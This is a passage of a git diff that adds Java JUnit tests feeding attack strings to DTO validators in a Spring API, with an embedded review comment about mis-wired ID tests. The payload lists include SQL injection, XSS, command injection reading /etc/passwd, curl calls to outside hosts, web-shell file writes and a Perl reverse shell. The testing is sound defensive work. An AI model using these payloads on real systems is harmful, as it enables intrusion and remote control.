Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "&& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "() { :;}; echo vulnerable 10", + "eval('echo 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')", + "eval('ls')", + "OR 1=1", + "OR 1=0", + "OR x=x", + "OR x=y", + "OR 1=1#", + "OR 1=0#", + "OR x=x#", + "OR x=y#", + "OR 1=1--", + "OR 1=0--", + "OR x=x--", + "OR x=y--", + "OR 3409=3409 AND ('pytW' LIKE 'pytW", + "OR 3409=3409 AND ('pytW' LIKE 'pytY", + "HAVING 1=1", + "HAVING 1=0", + "HAVING 1=1#", + "HAVING 1=0#", + "HAVING 1=1--", + "HAVING 1=0--", + "AND 1=1", + "AND 1=0", + "AND 1=1--", + "AND 1=0--", + "AND 1=1#", + "AND 1=0#", + "AND 1=1 AND '%'='", + "AND 1=0 AND '%'='", + "AND 
1083=1083 AND (1427=1427", + "AND 7506=9091 AND (5913=5913", + "AND 1083=1083 AND ('1427=1427", + //auth based sql injectio + "'-'", + "' '", + "'&'", + "'^'", + "'*'", + "' or ''-'", + "' or '' '", + "' or ''&'", + "' or ''^'", + "' or ''*'", + "\"-\"", + "\" \"", + "\"&\"", + "\"^\"", + "\"*\"", + "\" or \"\"-\"", + "\" or \"\" \"", + "\" or \"\"&\"", + "\" or \"\"^\"", + "\" or \"\"*\"", + "or true--", + "\" or true--", + "' or true--", + "\") or true--", + "') or true--", + "' or 'x'='x", + "') or ('x')=('x", + "')) or (('x'))=(('x", + "\" or \"x\"=\"x", + "\") or (\"x\")=(\"x", + "\")) or ((\"x\"))=((\"x", + "or 1=1", + "or 1=1--", + "or 1=1#", + "or 1=1/*", + "admin' --", + "admin' #", + "admin'/*", + "admin' or '1'='1", + "admin' or '1'='1'--", + "admin' or '1'='1'#", + "admin' or '1'='1'/*", + "admin'or 1=1 or ''='", + "admin' or 1=1", + "admin' or 1=1--", + "admin' or 1=1#", + "admin' or 1=1/*", + "admin') or ('1'='1", + "admin') or ('1'='1'--", + "admin') or ('1'='1'#", + "admin') or ('1'='1'/*", + "admin') or '1'='1", + "admin') or '1'='1'--", + "admin') or '1'='1'#", + "admin') or '1'='1'/*", + "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", + "admin\" --", + "admin\" #", + "admin\"/*", + "admin\" or \"1\"=\"1", + "admin\" or \"1\"=\"1\"--", + "admin\" or \"1\"=\"1\"#", + "admin\" or \"1\"=\"1\"/*", + "admin\"or 1=1 or \"\"=\"", + "admin\" or 1=1", + "admin\" or 1=1--", + "admin\" or 1=1#", + "admin\" or 1=1/*", + "admin\") or (\"1\"=\"1", + "admin\") or (\"1\"=\"1\"--", + "admin\") or (\"1\"=\"1\"#", + "admin\") or (\"1\"=\"1\"/*", + "admin\") or \"1\"=\"1", + "admin\") or \"1\"=\"1\"--", + "admin\") or \"1\"=\"1\"#", + "admin\") or \"1\"=\"1\"/*", + "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", + //XSS + "'`\"><\\x3Cscript>javascript:alert(1)", + "'`\"><\\x00script>javascript:alert(1)", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", 
+ "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "\\x3Cscript>javascript:alert(1)", + "'\"`>", + "", + "", + "--> -->", + "-->", + "", + "", + "", + "", + "", + "", + "t>", + "'-prompt(8)-'", + "\"-prompt(8)-\"", + "\";a=prompt,a()//\"", + "\"';a=prompt,a()//\"", + "'-eval(\"window['pro'%2B'mpt'](8)\")-'", + "\"-eval(\"window['pro'%2B'mpt'](8)\")-\"", + }) + @DisplayName("Security Test for ReviewDTOSaveRequest") + public void testSecurityVulnerabilitiesForSave(String text) { + ReviewDTOSaveRequest response = new ReviewDTOSaveRequest(text, 1,1L,1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource({ + "'1; DROP TABLE users;'", + "''", + "''", + "'',", + "''", + "''", + "''", + "'/index.html|id|'", + "';id;'", + "';id'", + "';netstat -a;'", + "';system(\'cat /etc/passwd\')'", + "'|id'", + "'|/usr/bin/id'", + "'|id|'", + "'|/usr/bin/id|'", + "'||/usr/bin/id|'", + "'|id;', 1", + "'||/usr/bin/id;'", + "';id|'", + "';|/usr/bin/id|'", + "'\\n/bin/ls -al\\n'", + "'\\n/usr/bin/id\\n'", + "'\\nid\\n'", + "'\\n/usr/bin/id;'", + "'\\nid;'", + "'\\n/usr/bin/id|'", + "'\\nid|'", + "';/usr/bin/id\\n'", + "';id\\n'", + "'|usr/bin/id\\n'", + "'|nid\\n'", + "'`id`'", + "'`/usr/bin/id`'", + "'a);id'", + "'a;id'", + "'a);id;'", + "'a;id;'", + "'a);id|'", + "'a;id|'", + "'a)|id'", + "'a|id'", + "'a)|id;'", + "'a|id'", + "'|/bin/ls -al'", + "'a);/usr/bin/id'", + "'a;/usr/bin/id'", + "'a);/usr/bin/id;'", + "'a;/usr/bin/id;'", + "'a);/usr/bin/id|'", + "'a;/usr/bin/id|'", + "'a)|/usr/bin/id'", + "'a|/usr/bin/id'", + "'a)|/usr/bin/id;'", + "'a|/usr/bin/id'", + "';system(\'cat /etc/passwd\')'", + "';system(\'id\')', 1", + "';system(\'/usr/bin/id\')'", + "'%0Acat /etc/passwd'", + 
"'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A'", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A', 1", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "||", + "|", + ";", + "'", + "'\"", + "\"'", + "&", + "&&", + "%0a", + "%0a%0d", + "%0Aid", + "%0a id %0a", + "%0Aid%0A", + "%0a ping -i 30 127.0.0.1 %0a", + "%0A/usr/bin/id", + "%0A/usr/bin/id%0A", + "%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1`", + "#' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\"", + "|ping -n 21 127.0.0.1", + "%20{${phpinfo()}}", + "%20{${sleep(20)}}", + "%20{${sleep(3)}}", + "a|id|", "a;id|", + "a;id;", + "a;id\n", + "() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12", + "| curl http://crowdshield.com/.testing/rce.txt", + "& curl http://crowdshield.com/.testing/rce.txt", + "; curl https://crowdshield.com/.testing/rce_vuln.txt", + "&& curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt`", + "#' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\"", + "|curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)", + "| dir", "; dir", "$(`dir`)", "& dir", + "&&dir", "&& dir", "| dir C:\\", "; dir C:\\", + "& dir C:\\", "&& dir C:\\", "dir C:\\", + "| dir C:\\Documents and Settings\\*", + "; dir C:\\Documents and Settings\\*", + "& dir C:\\Documents and Settings\\*", + "&& dir C:\\Documents and Settings\\*", + "dir C:\\Documents and Settings\\*", + "| dir C:\\Users", 
"; dir C:\\Users", + "& dir C:\\Users", "&& dir C:\\Users", + "dir C:\\Users", ";echo%20''", + "echo ''// XXXXXXXXXXX", + "| echo \"\" > rfi.php", + "; echo \"\" > rfi.php", + "& echo \"\" > rfi.php", + "&& echo \"\" > rfi.php", + "echo \"\" > rfi.php", + "| echo \"\" > dir.php", + "; echo \"\" > dir.php", + "& echo \"\" > dir.php", + "&& echo \"\" > dir.php", + "echo \"\" > dir.php", + "| echo \"\" > cmd.php", + "; echo \"\" > cmd.php", + "& echo \"\" > cmd.php", + "&& echo \"\" > cmd.php", + "echo \"\" > cmd.php", + ";echo ''", + "echo ''// XXXXXXXXXXX", + "echo ''// XXXXXXXXXXX", + "| echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "; echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "&& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "() { :;}; echo vulnerable 10", + "eval('echo 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')", + "eval('ls')", + "OR 1=1", + "OR 1=0", + "OR x=x", + "OR x=y", + "OR 1=1#", + "OR 1=0#", + "OR x=x#", + "OR x=y#", + "OR 1=1--", + "OR 1=0--", + "OR x=x--", + "OR x=y--", + "OR 3409=3409 AND ('pytW' LIKE 'pytW", + "OR 3409=3409 AND ('pytW' LIKE 'pytY", + "HAVING 1=1", + "HAVING 1=0", + "HAVING 1=1#", + "HAVING 1=0#", + "HAVING 1=1--", + "HAVING 1=0--", + "AND 1=1", + "AND 1=0", + "AND 1=1--", + "AND 1=0--", + "AND 1=1#", + "AND 1=0#", + "AND 1=1 AND '%'='", + "AND 1=0 AND '%'='", + "AND 
1083=1083 AND (1427=1427", + "AND 7506=9091 AND (5913=5913", + "AND 1083=1083 AND ('1427=1427", + //auth based sql injectio + "'-'", + "' '", + "'&'", + "'^'", + "'*'", + "' or ''-'", + "' or '' '", + "' or ''&'", + "' or ''^'", + "' or ''*'", + "\"-\"", + "\" \"", + "\"&\"", + "\"^\"", + "\"*\"", + "\" or \"\"-\"", + "\" or \"\" \"", + "\" or \"\"&\"", + "\" or \"\"^\"", + "\" or \"\"*\"", + "or true--", + "\" or true--", + "' or true--", + "\") or true--", + "') or true--", + "' or 'x'='x", + "') or ('x')=('x", + "')) or (('x'))=(('x", + "\" or \"x\"=\"x", + "\") or (\"x\")=(\"x", + "\")) or ((\"x\"))=((\"x", + "or 1=1", + "or 1=1--", + "or 1=1#", + "or 1=1/*", + "admin' --", + "admin' #", + "admin'/*", + "admin' or '1'='1", + "admin' or '1'='1'--", + "admin' or '1'='1'#", + "admin' or '1'='1'/*", + "admin'or 1=1 or ''='", + "admin' or 1=1", + "admin' or 1=1--", + "admin' or 1=1#", + "admin' or 1=1/*", + "admin') or ('1'='1", + "admin') or ('1'='1'--", + "admin') or ('1'='1'#", + "admin') or ('1'='1'/*", + "admin') or '1'='1", + "admin') or '1'='1'--", + "admin') or '1'='1'#", + "admin') or '1'='1'/*", + "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", + "admin\" --", + "admin\" #", + "admin\"/*", + "admin\" or \"1\"=\"1", + "admin\" or \"1\"=\"1\"--", + "admin\" or \"1\"=\"1\"#", + "admin\" or \"1\"=\"1\"/*", + "admin\"or 1=1 or \"\"=\"", + "admin\" or 1=1", + "admin\" or 1=1--", + "admin\" or 1=1#", + "admin\" or 1=1/*", + "admin\") or (\"1\"=\"1", + "admin\") or (\"1\"=\"1\"--", + "admin\") or (\"1\"=\"1\"#", + "admin\") or (\"1\"=\"1\"/*", + "admin\") or \"1\"=\"1", + "admin\") or \"1\"=\"1\"--", + "admin\") or \"1\"=\"1\"#", + "admin\") or \"1\"=\"1\"/*", + "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", + //XSS + "'`\"><\\x3Cscript>javascript:alert(1)", + "'`\"><\\x00script>javascript:alert(1)", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", 
+ "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "\\x3Cscript>javascript:alert(1)", + "'\"`>", + "", + "", + "--> -->", + "-->", + "", + "", + "", + "", + "", + "", + "t>", + "'-prompt(8)-'", + "\"-prompt(8)-\"", + "\";a=prompt,a()//\"", + "\"';a=prompt,a()//\"", + "'-eval(\"window['pro'%2B'mpt'](8)\")-'", + "\"-eval(\"window['pro'%2B'mpt'](8)\")-\"", + }) + @DisplayName("Security Test for ReviewDTOSaveRequest") + public void testSecurityVulnerabilitiesForPatch(String text) { + ReviewDTOPatchRequest response = new ReviewDTOPatchRequest(1L,text, 1,1L,1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + //Test for other stuff + + @ParameterizedTest + @CsvSource(textBlock = """ + -1 + -123 + -4563 + -75457 + -256235 + 34 + -5 + 6 + 7 + 8 + 9 + 10 + """) + @DisplayName("Security Test for Rating") + public void testSecurityVulnerabilitiesForRating(int rating){ + ReviewDTOSaveRequest response = new ReviewDTOSaveRequest("text", rating,1L,1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource(textBlock = + """ + -1 + -2 + -3 + -897354897 + -34589724 + """) + @DisplayName("Security Test for UserId") + public void testSecurityVulnerabilitiesForUserId(int rating) { + ReviewDTOPatchRequest response = new ReviewDTOPatchRequest(1L, "text", rating, 1L, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource(textBlock = + """ + -4 + -14 + -24 + -8354897 + -94535724 + """) + @DisplayName("Security Test for PacoteId") + public void testSecurityVulnerabilitiesForPacoteId(int rating) { + ReviewDTOPatchRequest response = new ReviewDTOPatchRequest(1L, 
"text", rating, 1L, 1L);
+ Set> violations = validator.validate(response);
+ assertFalse(violations.isEmpty());
+ }
+
+
+}
\ No newline at end of file
diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/TipoPacoteDTOTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/TipoPacoteDTOTest.java
new file mode 100644
index 00000000..1473e9f7
--- /dev/null
+++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/TipoPacoteDTOTest.java
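Review bot: `testSecurityVulnerabilitiesForUserId` and `testSecurityVulnerabilitiesForPacoteId` never exercise the ID fields they are named after: both take the negative value as `int rating` and pass it in the third constructor position, which the Patch test above (`new ReviewDTOPatchRequest(1L,text, 1,1L,1L)`) shows is the rating slot, while the two `Long` ID arguments stay hard-coded at `1L`. The assertions go green only because the negative rating trips the rating constraint, so a missing or wrong `@Positive` on `userId`/`pacoteId` — the very constraints the rest of this commit adds to the DTOs — would go undetected. Change the parameter to `long userId` and pass it in the ID position, e.g. `ReviewDTOPatchRequest response = new ReviewDTOPatchRequest(1L, "text", 1, userId, 1L);` (and the mirror for `pacoteId` in the last slot — confirm the argument order against the DTO constructor, which is not in this hunk), and tighten the oracle to the field under test, `assertTrue(violations.stream().anyMatch(v -> v.getPropertyPath().toString().equals("userId")));`, so an unrelated violation cannot mask a gap. As a secondary point, these tests only use `Validation.buildDefaultValidatorFactory()` and need no Spring context; dropping `@SpringBootTest` would make the suite considerably faster without changing what is asserted.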
@@ -0,0 +1,401 @@
+package isep.ipp.pt.api.desofs.securityTests;
+
+import isep.ipp.pt.api.desofs.Dto.TipoPacoteDTO.ControllerLayer.TipoPacoteDTOResponse;
+import isep.ipp.pt.api.desofs.Dto.TipoPacoteDTO.ControllerLayer.TipoPacoteDTOSaveRequest;
+import jakarta.validation.ConstraintViolation;
+import jakarta.validation.Validation;
+import jakarta.validation.Validator;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.DisplayName;
+import org.junit.jupiter.params.ParameterizedTest;
+import org.junit.jupiter.params.provider.CsvSource;
+import org.springframework.boot.test.context.SpringBootTest;
+
+import java.util.Set;
+
+import static org.junit.jupiter.api.Assertions.*;
+
+@SpringBootTest
+class TipoPacoteDTOTest {
+
+ private Validator validator;
+ @BeforeEach
+ void setUp() {
+ validator = Validation.buildDefaultValidatorFactory().getValidator();
+ }
+ @ParameterizedTest
+ @CsvSource({
+ "ValidName, 1, 0",
+ "'', 1, 2",
+ "Invalid@Name, 1, 1",
+ "ThisNameIsWayTooLong, 1, 1",
+ "ValidName, , 1",
+ "ValidName, -1, 1"
+ })
+ @DisplayName("Parameterized Test for TipoPacoteDTOResponse")
+ public void testTipoPacoteDTOResponse(String nome, Long tipoPacoteId, int expectedViolationCount) {
+ TipoPacoteDTOResponse response = new TipoPacoteDTOResponse(nome, tipoPacoteId);
+ Set> violations = validator.validate(response);
+ assertEquals(expectedViolationCount, violations.size());
+ }
+
+ @ParameterizedTest
+ @CsvSource({
+ "'1; DROP TABLE users;'",
+ "''",
+ "''",
+ "'',",
+ "''",
+ "''",
+ "''",
+ "'/index.html|id|'",
+ "';id;'",
+ "';id'",
+ "';netstat -a;'",
+ "';system(\'cat /etc/passwd\')'",
+ "'|id'",
+ "'|/usr/bin/id'",
+ "'|id|'",
+ "'|/usr/bin/id|'",
+ "'||/usr/bin/id|'",
+ "'|id;', 1",
+ "'||/usr/bin/id;'",
+ "';id|'",
+ "';|/usr/bin/id|'",
+ "'\\n/bin/ls -al\\n'",
+ "'\\n/usr/bin/id\\n'",
+ "'\\nid\\n'",
+ "'\\n/usr/bin/id;'",
+ "'\\nid;'",
+ "'\\n/usr/bin/id|'",
+ "'\\nid|'",
+ "';/usr/bin/id\\n'",
+ "';id\\n'",
+ "'|usr/bin/id\\n'",
+
"'|nid\\n'", + "'`id`'", + "'`/usr/bin/id`'", + "'a);id'", + "'a;id'", + "'a);id;'", + "'a;id;'", + "'a);id|'", + "'a;id|'", + "'a)|id'", + "'a|id'", + "'a)|id;'", + "'a|id'", + "'|/bin/ls -al'", + "'a);/usr/bin/id'", + "'a;/usr/bin/id'", + "'a);/usr/bin/id;'", + "'a;/usr/bin/id;'", + "'a);/usr/bin/id|'", + "'a;/usr/bin/id|'", + "'a)|/usr/bin/id'", + "'a|/usr/bin/id'", + "'a)|/usr/bin/id;'", + "'a|/usr/bin/id'", + "';system(\'cat /etc/passwd\')'", + "';system(\'id\')', 1", + "';system(\'/usr/bin/id\')'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A'", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A', 1", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "||", + "|", + ";", + "'", + "'\"", + "\"'", + "&", + "&&", + "%0a", + "%0a%0d", + "%0Aid", + "%0a id %0a", + "%0Aid%0A", + "%0a ping -i 30 127.0.0.1 %0a", + "%0A/usr/bin/id", + "%0A/usr/bin/id%0A", + "%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1`", + "#' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\"", + "|ping -n 21 127.0.0.1", + "%20{${phpinfo()}}", + "%20{${sleep(20)}}", + "%20{${sleep(3)}}", + "a|id|", "a;id|", + "a;id;", + "a;id\n", + "() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12", + "| curl http://crowdshield.com/.testing/rce.txt", + "& curl http://crowdshield.com/.testing/rce.txt", + "; curl https://crowdshield.com/.testing/rce_vuln.txt", + "&& curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt`", + "#' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\"", + "|curl 
https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)", + "| dir", "; dir", "$(`dir`)", "& dir", + "&&dir", "&& dir", "| dir C:\\", "; dir C:\\", + "& dir C:\\", "&& dir C:\\", "dir C:\\", + "| dir C:\\Documents and Settings\\*", + "; dir C:\\Documents and Settings\\*", + "& dir C:\\Documents and Settings\\*", + "&& dir C:\\Documents and Settings\\*", + "dir C:\\Documents and Settings\\*", + "| dir C:\\Users", "; dir C:\\Users", + "& dir C:\\Users", "&& dir C:\\Users", + "dir C:\\Users", ";echo%20''", + "echo ''// XXXXXXXXXXX", + "| echo \"\" > rfi.php", + "; echo \"\" > rfi.php", + "& echo \"\" > rfi.php", + "&& echo \"\" > rfi.php", + "echo \"\" > rfi.php", + "| echo \"\" > dir.php", + "; echo \"\" > dir.php", + "& echo \"\" > dir.php", + "&& echo 